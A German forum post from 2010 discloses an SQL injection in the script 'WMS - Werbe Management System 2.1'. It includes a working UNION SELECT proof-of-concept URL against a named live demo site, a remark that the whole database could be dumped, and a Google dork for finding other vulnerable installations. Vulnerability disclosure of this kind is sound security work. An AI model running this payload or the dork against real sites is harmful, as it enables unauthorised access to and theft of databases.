ADAC OnlineShop Newsletteranmeldung
Alt 02.01.2010, 01:53:56   #1 (permalink)
Lan
Neuer Benutzer

Reg: 02.01.2010
Beiträge: 1
Lan befindet sich auf einem aufstrebenden Ast
Standard High Risk Sicherheitslücke in "WMS - Werbe Management System 2.1"

Wollte Sie nur darauf hinweisen das ein Kollege von mir eine glasklare SQL-Injection im oben genannten Script gefunden hat.

Im Sourcecode wird der Queryresult von GET-Parameter "buchen" ungefiltert ausgegeben:

Code:
1:
<input type='hidden' name='bannerart' value='RESULT'>
Proof of Concept:

Code:
1:
http://hantschel.info/wms_demo/banner_buchen.php?buchen=5 and 1=2 union select concat_ws(0x2f,version(),user()),2,3,4,5,6,7,8,9&menge=FoundByStarlight&art=Injection:
Direkt an der Herstellerdemo liegt die Lücke auch vor.

Als Beispiel habe ich nur die MySQL Version und den MySQL User ausgeben lassen. Man könnte aber mit SELECT x FROM y.z LIMIT a,b ODER WHERE c=d die komplette Datenbank leerräumen.

Da ich die Source nicht vorliegen habe kann ich leider keinen Patch anbieten.

Ich empfehle Ihnen aber das Script vorrübergehend zu deaktivieren bis der Herrausgeber die Lücke gefixt hat.

Verwundbare Seiten kann man ganz einfach mit Google finden:

inurl:/banner_buchen.php

Mfg
Lan ist offline   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[A] Versteiger meine lizenz von WMS - Werbe Management System Moogliefoot Lose4Scripts (erledigt) 4 11.12.2009 19:27:00
(V) Netseeker - Inklusive Werbe-Management System! webace Lose4Scripts 4 08.07.2009 13:17:46
[S]WMS - Werbe Management System 2.0 susi2000 Lose4Scripts 1 26.11.2007 13:01:13
[V] "Umfangreiches" professionelles Content Management System (Screenshots vorhanden) Yooda Lose4Scripts 23 26.06.2007 02:54:17


Alle Zeitangaben in WEZ +1. Es ist jetzt 21:54:37 Uhr.